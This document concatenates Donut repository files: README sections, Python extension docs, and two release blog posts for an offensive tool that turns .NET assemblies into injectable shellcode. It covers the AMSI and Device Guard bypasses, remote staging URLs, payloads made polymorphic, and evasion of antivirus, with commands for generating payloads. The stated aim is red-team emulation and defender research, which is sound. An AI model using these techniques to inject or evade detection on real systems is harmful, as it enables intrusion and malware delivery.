59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
0 # Python Extension
1
2 A Python C extension is now available which allows you to dynamically generate donut shellcode in Python.
3
4 ## Requirements
5
6 The extension has only been tested in Python 3.7, it shouldn't have any compatibility issues with older 3.X versions of Python.
7
8 It will ***not*** work in Python 2.x.
9
10 ## Installing the Extension
11
12 (Once the extension has been published to PyPi)
13 ```
14 pip3 install donut-shellcode
15 ```
16
17 ## Manually Compiling And Installing the Extension
18
19 ```bash
20 git clone https://github.com/TheWover/donut && cd donut
21 pip3 install . # or python setup.py install
22 ```
23
24 ## Usage
25
26 The Python extension accepts the same parameters as the main donut executable.
27
28 Here's a minimalistic example of using the extension:
29
30 ```python
31 import donut
32 shellcode = donut.create(file="naga.exe", params='https://172.16.164.1/')
33 ```
34
35 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
36
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
38
39 ```python
40 import donut
41
42 shellcode = donut.create(
43 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
44 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
47 cls='namespace.class', # Optional class name. (required for .NET DLL)
48 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
50 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
51 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
52 )
53 ```
54
55 ## Author
56
57 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
0 ---
1 layout: post
2 title: Donut v0.9.1 "Apple Fritter" - Dual-Mode Shellcode, AMSI, and More
3 ---
4
5 *TLDR: Version v0.9.1 "Apple Fritter" of Donut has been released, including dual-mode (AMD64+x86) shellcode, AMSI bypassing for .NET v4.8, automatic version detection of payloads, better support for Program.Main().*
6
7 # Introduction
8
9 In case you are unaware, [Donut](https://github.com/TheWover/donut "Donut") is a shellcode generation tool that creates native shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
10
11 Today, we released version v0.9.1. The major features include:
12
13 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
14 * Automatic detection of the CLR version required for .NET Assembly payloads.
15 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
16 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
17 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
18 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
19
20 # Feature Breakdown
21
22 ## Dual-Mode Shellcode
23
24 Odzhan knew an old trick for crafting shellcode that can run in either x86 or x64 Windows processes using REX prefixes. We combine the x86 and x64 shellcode with a stub that "detects" the architecture of the process. The layout in memory looks like:
25
26 ```
27 --------------------------------------------------
28 | detection stub | x64 shellcode | x86 shellcode |
29 --------------------------------------------------
30 ```
31
32 And the logic:
33
34 ```assembly
35 0x31C0 xor eax, eax // null eax
36 0x48 dec eax // decrement eax to produce an underflow
37 0x0F88 js dword x86_code // jump to x86 payload if we are in a WOW64 process
38 <x64_code> // the x64 PIC machine code for the payload
39 <x86_code> // the x86 PIC machine code for the payload
40 ```
41
42 There are two ways this code can execute.
43
44 If the process is WOW64 (x86):
45
46 1) ```eax``` will be nulled.
47 2) ```eax``` will be decremented, resulting in an underflow.
48 3) Since the sign flag is set from the underflow, the condition for the jump is satisfied. Jump to the x86 shellcode.
49
50 If the process is x64:
51
52 1) ```eax``` will be nulled.
53 2) ```0x48``` is an REX prefix for the next instruction
54 3) The previous REX prefix is not valid for the ```js``` instruction. As such, nothing happens.
55 4) Since the x64 PIC is immediately following the previous instruction in memory, ```eip``` is now pointing at the first instruction in the x64 PIC. It now executes.
56
57 Starting in the v0.9.1 "Apple Fritter" release, dual-mode shellcode is the default. You may still tell Donut to produce x86 or x64 shellcode, rather than AMD64+x86.
58
59 Naturally, the dual-mode PIC will be larger than the other options. If the size of the PIC matters, use the version for the particular process you are targeting. Or, have your injector check the architecture of the target process before injecting into it. If not, use the dual-mode version to ensure maximum compatbility with host processes.
60
61 ## Auto-Detect CLR Version
62
63 Rather than require the user to specify the CLR version, we now read the headers of the .NET Assembly to determine the appropriate CLR version.
64
65 The .NET Assembly file format is an extension of the regular [PE Format](https://en.wikipedia.org/wiki/Portable_Executable) used by Windows executables. One of the optional fields used by .NET is the ```IMAGE_COR20_HEADER```, which references a ```STORAGESIGNATURE``` structure containing the version details necessary to load the correct runtime. We check the ```iVersionString``` variable to get the exact version requirement for your Assembly. Please note, the names of these data structures and variables are somewhat arbitrary. I am borrowing [dnSpy's](https://github.com/0xd4d/dnSpy) terminology so that I can show you these two pretty pictures.
66
67 The relevant layout of the .NET headers in my SafetyKatz DLL as stored on disk:
68
69 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/headers_in_PE.PNG)
70
71 And what the ```STORAGESIGNATURE``` structure actually looks like:
72
73 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/structured_headers.PNG)
74
75 If you do not want us to automatically determine the version number, you may still manually specify what version to use with the `-r` flag.
76
77
78 ## Main Entry Point
79
80 The original version of Donut did not handle Main entry points for EXEs well due to the fact that it uses an object array as its function signature rather than a string array. We now correctly handle this so that you don't have to know about the difference. :-)
81
82 ## AMSI Patching
83
84 To provide some context, AMSI integration has been added to the new version of the .NET Framework. It has also been ported to [.NET Core](https://github.com/dotnet/coreclr/issues/21370).
85
86 Specifically, AMSI integration was added to the CLR itself so that any .NET Assemblies loaded from memory will be scanned with ```AmsiScanBuffer``` from ```amsi.dll``` before they are loaded. If the result of ```AmsiScanBuffer``` is anything but ```S_OK``` it will return an ```HRESULT``` error code. This affects everything that loads Assemblies from memory using the CLR, including ```System.Reflection.Assembly.Load```, Donut shellcode, and (presumably if I could test it) Cobalt Strike's ```execute-assembly``` command.
87
88 When you try to load a .NET Assembly from memory that is known to be malicious, you get a Defender alert that looks like the picture below. Notice that data source was AMSI, and that the process it was running in is ```notepad.exe```. The assembly was injected into notepad through Donut shellcode.
89
90 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/donut_AMSI.PNG)
91
92 However, their implementation of AMSII integration is subject to memory patching bypasses in the same way that PowerShell is. We developed on existing research, produced some custom bypasses, and added a modular bypass system to Donut that lets you choose which technique you would like to use.
93
94 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) detailing each of the AMSI bypasses we added to Donut. It is important to note that there could be many more. I believe that anyone who sits down to do the research and develop an AMSI bypass will probably come up with their own slightly different variant. As long as Microsoft continues to rely on calling DLL functions from user-level memory space, AMSI will be subject to memory patching bypasses.
95
96 The result looks like the picture below. I safely injected SafetyKatz into ```notepad.exe``` using Donut shellcode, even thought AMSI was used. Defender shows no detections.
97
98 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/amsi_is_dead.PNG)
99
100 I must strongly emphasize, the fact that 4.8 AMSI can be bypassed like in PowerShell does NOT make it useless. This new AMSI is a *good thing* that will benefit .NET Security. It incurs cost upon adversaries. Use it. But also recognise that, like everything, it has its limitations.
101
102 ### Modular Bypass System
103
104 As we researched bypasses for AMSI, it became clear that there is many ways to do it. It would be silly to force users of Donut to have to use whatever we came up with. As such, we ensured that you may easily add your own bypass or customize one of ours. The bypasses are defined in ```payload/bypass.c```. You may either modify our C code, or add your own. Each bypass implements the same ```BOOL DisableAMSI(PDONUT_INSTANCE inst)``` function and is wrapped in an ```#ifdef BYPASS_NAME``` preprocessor directive. To change which bypass is used, change the Makefile to define the bypass name specified by the directive.
105
106 For example, you could change the relevant line in ```payload/Makefile.msvc``` from
107
108 ```
109 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
110 ```
111
112 To:
113
114 ```
115 cl -DBYPASS_AMSI_B -DBYPASS_WLDP_A -Zp8 -c -nologo -Os -O1 -Gm- -GR- -EHa -Oi -GS- -I ..\include payload.c ..\hash.c ..\encrypt.c bypass.c clib.c
116 ```
117
118 In order to switch from using BypassA to BypassB.
119
120 This system not only makes it easy to change the bypass technique, but also reduces the size, complexity, and signaturability of the shellcode by ensuring that code you are not using is present in the PIC to be found by AV/EDR.
121
122 ## Device Guard Dynamic Code Prevention Bypass
123
124 Windows Defender Device Guard includes an optional policy for disabling dynamically-generated .NET code from executing. Because it was mixed-in with the AMSI scanning code, we went ahead and disabled it too. Not sure if that will help anyone, but hey it was easy. ¯\_(ツ)_/¯
125
126 ![_config.yml]({{ site.baseurl }}/images/Apple_Fritter/code_integrity.png)
127
128 # Conclusion
129
130 Donut v0.9.1 "Apple Fritter" represents the first improvements to Donut. More improvements are coming as we have time to make them. In the meantime, Donut is still in Beta so we welcome feedback and testing.
131
132 I know that several people have already had difficulties integrating Donut into their toolsets because of the complexity of the data structures it uses. To help with this, our plan for the full release (version 1.0) is to produce C# and Python generators. That will be the primary focus of our efforts moving forward.
133
134 ## Plans
135
136 Below is the current version release plan for Donut.
137
138 * v0.9.1:
139 * Dual-Mode shellcode that can run in either x64 for x86 (WOW64) processes.
140 * Automatic detection of the CLR version required for .NET Assembly payloads.
141 * AMSI bypassing for version .NET 4.8 that ensure all Assemblies can be safely loaded.
142 * Modular system for adding bypasses. Your choide of bypass functionality is compiled into payload.exe based on compiler flags.
143 * Bypass for Device Guard policy preventing execution of dynamically generated .NET code
144 * Better handling of Main functions (Entry Points) that use an object array containing string arrays, rather than an array of strings
145 * v1.0:
146 * C# generator
147 * C# wrapper for our dynamic library
148 * Python generator
149 * Python wrapper for our dynamic library
150 * Better documentation for debugging, designing with, and integrating Donut.
151 * v1.1:
152 * Automatic unloading of Application Domains after the Assembly finishes executing.
153 * Support for HTTP proxies
0 ---
1 layout: post
2 title: Donut - Injecting .NET Assemblies as Shellcode
3 ---
4
5 *TLDR: You can now inject .NET Assemblies into Windows processes using this repo: https://github.com/TheWover/donut/*
6
7 # Advancing Tradecraft - Context
8
9 Offensive and red team tradecraft have changed significantly in the past year. As anti-malware systems improve their capability to detect and deter offensive tools, attackers are shifting their focus to technologies that are not observed by AV. Currently, that means operating entirely in memory and avoiding dropping files onto disk. In the Windows world, the .NET Framework provides a convenient mechanism for this. It is, however, severely restricted in that .NET programs cannot be injected directly into remote processes. In this article, we will address this issue by describing how to inject .NET code into processes via shellcode.
10
11 ## .NET Primer
12
13 Before we begin, you must understand a few important components of .NET.
14
15 <details>
16 <summary>Click to expand the primer!</summary>
17
18 * [Common Language Runtime](https://docs.microsoft.com/en-us/dotnet/standard/clr "Common Language Runtime"): Like Java, .NET uses a runtime environment (or "virtual machine") to interpret code at runtime. All .NET Code is compiled from an intermediate language to native code "Just-In-Time" before execution.
19 * [Common Intermediate Language](https://docs.microsoft.com/en-us/dotnet/standard/managed-code "Common Intermediate Language"): Speaking of an intermediate language, .NET uses CIL (also known as MSIL). All .NET languages (of which there are many) are "assembled" to this intermediate language. CIL is a generic object-oriented assembly language that can be interpreted into machine code for any hardware architecture. As such, the designers of .NET languages do not need to design their compilers around the architectures they will run on. Instead, they merely need to design it to compile to one language: CIL.
20 * [.NET Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/assemblies-in-the-common-language-runtime ".NET Assemblies"): .NET applications are packaged into .NET Assemblies. They are so called because the code from your language of choice has been "assembled" into CIL but not truly compiled. Assemblies use an extension of the PE format and are represented as either an EXE or a DLL that contains CIL rather than native machine code.
21 * [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains "Application Domains"): Assemblies are run inside of a safe "box" known as an Application Domain. Multiple Assemblies can exist within an AppDomain, and multiple AppDomains can exist within a process. AppDomains are intended to provide the same level of isolation between executing Assemblies as is normally provided for processes. Threads may move between AppDomains and can share objects through marshalling and delegates.
22 </details>
23
24 ## Current state of .NET Tradecraft
25
26 Currently, .NET tradecraft is limited to post-exploitation execution by one of two main ways:
27
28 * Assembly.Load(): The .NET Framework's standard library includes an API for [code reflection](https://en.wikipedia.org/wiki/Reflection_(computer_programming)). This Reflection API includes System.Reflection.Assembly.Load, which can be used to load .NET programs from memory. In less than five lines of code, you may load a .NET DLL or EXE from memory and execute it.
29 * execute-assembly: In Cobalt Strike 3.11, Raphael Mudge introduced a command called 'execute-assembly' that ran .NET Assemblies from memory as if they were run from disk. This command introduced the world to .NET tradecraft and signalled the shift to [Bringing Your Own Land](https://www.fireeye.com/blog/threat-research/2018/06/bring-your-own-land-novel-red-teaming-technique.html).
30
31 However, both execution vectors produce challenges for red teams seeking to develop flexible TTPs.
32
33 ## Assembly.Load
34
35 While the Reflection API is very versatile and can be useful in many different ways, it can only run code in the current process. No support is provided for running payloads in remote processes.
36
37 ## execute-assembly
38
39 The main problem with execute-assembly is that it executes the same way every time. That predictability ensures that it is reliable, but also lets defenders built analytics.
40
41 1. A subprocess is created using the *spawnto* executable. Mudge refers to this as a "sacrificial process" because it acts as a host for your payloads, isolating your Beacon's process from any failure in your code.
42 2. A reflective DLL is injected into the subprocess to load the .NET Runtime.
43 3. The reflective DLL loads an intermediate .NET Assembly to handle errors and improve the stability of your payload.
44 4. The intermediate .NET Assembly loads your .NET Assembly from memory inside the subprocess.
45 5. The main entry point of your Assembly is invoked along with your command-line arguments.
46
47 The result is that execute-assembly *does* allow you to inject your .NET Assembly into a remote process. However, it does not let you inject into a running process or specify how that injection occurs. It is only modular in *what* you can run, not *how* you can run it. The most that you can do is to specify what exceutable is run for your sacrificial subprocess by changing the *spawnto* variable in your Malleable C2 Profile. execute-assembly also has a hidden size limitation of 1 MB for your payloads, which limits your flexibility in designing post-exploitation tools.
48
49 ## Moving Forward
50
51 To move past these limitations, we need a technique that meets the following requirements:
52
53 * Allows you to run .NET code from memory.
54 * Can work with any Windows process, regardless of its architecture and whether it has the CLR loaded.
55 * Allows you to inject that code in either a remote (different) process or the local (current) process.
56 * Allows you to determine in what way that injection occurs.
57 * Works with multiple types of process injection.
58
59 The most flexible type of payload that meets those requirements is shellcode. But you can't just convert a .NET Assembly to shellcode. They run through a runtime environment, not directly on the hardware. Wouldn't it be great if we could just inject .NET Assemblies as shellcode? Yes. Yes, it would.
60
61 # Introducing Donut
62
63 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/donut.png)
64
65 ```Shortly before publishing donut, Odzhan and I became aware of another team working on a shellcode generator for .NET Assemblies. They were at the same stage of their project at us. We both agreed that whomever of us published first would ensure that the other received due credit for their work. As soon as they publish their tool, we will update this article with a link.```
66
67 Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
68
69 Donut is currently at version 0.9 (Beta). Please share any issues or suggestions with us as Issues on GitHub. Once we have received feedback, we will release version 1.0. A link to the compiled v0.9 release can be found [here](https://github.com/TheWover/donut "Release 0.9").
70
71 # How it Works
72
73 ## Unmanaged Hosting API
74
75 Microsoft provides an API known as the [Unmanaged CLR Hosting API](https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/). This API allows for unmanaged code (such as C or C++) to host, inspect, configure, and use Common Language Runtimes. It is a legitimate API that can be used for many purposes. Microsoft uses it for several of their products, and other companies use it to design custom loaders for their programs. It can be used to improve performance of .NET applications, create sandboxes, or just do wierd stuff. We do the latter.
76
77 One of the things it can do is manually load .NET Assemblies into arbitrary [Application Domains](https://docs.microsoft.com/en-us/dotnet/framework/app-domains/application-domains). It can do this either from disk or from memory. We utilize its capability for loading from memory to load your payload without touching disk.
78
79 To see a standalone example of an Unmanaged CLR Hosting Assembly loader, check out Casey Smith's repo: [AssemblyLoader](https://github.com/caseysmithrc/AssemblyLoader)
80
81 ## CLR Injection
82
83 The first action that donut's shellcode takes is to load the CLR. Unless the user specifies the exact runtime version to use, v4.0.30319 of the CLR will be used by default, which supports the versions 4.0+ of .NET. If the attempt to load a specific version fails, then donut will attempt to use whichever one is avialable on the system. Once the CLR is loaded, the shellcode creates a new Application Domain. At this point, the .NET Assembly payload must be obtained. If the user provided a staging URL, then the Assembly is downloaded from it. Otherwise, it is obtained from memory. Either way, it will loaded into the new AppDomain. After the Assembly is loaded but before it is run, the decrypted copy will be released and later freed from memory with VirtualFree to deter memory scanners. Finally, the Entry Point specified by the user will be invoked along with any provided parameters.
84
85 If the CLR is already loaded into the host process, then donut's shellcode will still work. The .NET Assembly will just be loaded into a new Application Domain within the managed process. .NET is designed to allow for .NET Assemblies built for multiple versions of .NET to run simultaneously in the same process. As such, your payload should always run no matter the process's state before injection.
86
87 ## Shellcode Generation
88
89 The logic above describes how the shellcode generated by donut works. That logic is defined in payload.exe. To get the shellcode, exe2h extracts the compiled machine code from the .text segment in payload.exe and saves it as a C array to a C header file. donut combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
90
91 # Using Donut
92
93 Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Both a Windows EXE and a Python (Python planned for v1.0) script are provided for payload generation. The command-line syntax is as described below.
94
95 ```
96 usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
97
98 -f <path> .NET assembly to embed in PIC and DLL.
99 -u <URL> HTTP server hosting the .NET assembly.
100 -c <namespace.class> The assembly class name.
101 -m <method> The assembly method name.
102 -p <arg1,arg2...> Optional parameters for method, separated by comma or semi-colon.
103 -a <arch> Target architecture : 1=x86, 2=amd64(default).
104 -r <version> CLR runtime version. v4.0.30319 is used by default.
105 -d <name> AppDomain name to create for assembly. Randomly generated by default.
106
107 examples:
108
109 donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
110 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
111 ```
112
113 ## Generating Shellcode
114
115 To generate shellcode with donut, you must specify a .NET Assembly, an Entry Point, and any parameters that you wish to use. If your Assembly uses the *Test* namespace and includes the *Program* class with the *Main* method, then you would use the following options:
116
117 ```
118 donut.exe -f Test.exe -c Test.Program -m Main
119 ```
120
121 To generate the same shellcode for 32-bit processes, use the '-a' option:
122
123 ```
124 donut.exe -a 1 -f Test.exe -c Test.Program -m Main
125 ```
126
127 You may also provide parameters to whatever Entry Point you specify. The max length of each parameter is currently 32 characters. To demonstrate this functionality, you may use the following options and our example Assembly to create shellcode that will spawn a Notepad process and a Calc process:
128
129 ```
130 .\donut.exe -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
131 ```
132
133 When generating shellcode to run an an older Windows machine, you may need it to use v2 of the CLR, rather than v4. v2 works for versions of the .NET Framework <= 3.5, while v4 works for versions >= 4.0. By default, donut uses version 4 of the CLR. You may tell it to use v2 with the '-r' option and specifying "v2.0.50727" as the parameter.
134
135 ```
136 .\donut.exe -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
137 ```
138
139 The name of the AppDomain for your .NET payload may be specified manually using the '-d' option. By default, it will be randomly generated. You may specify a name.
140
141 ```
142 .\donut.exe -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
143 ```
144
145 In order to reduce the size of your shellcode (or for many other reasons), you may specify a URL where your payload will be hosted. Donut will produce an encrypted Donut Module with a random name that you should place at the URI you specified. The name and location where you should place it will be printed to your screen when you generate the shellcode.
146
147 ```
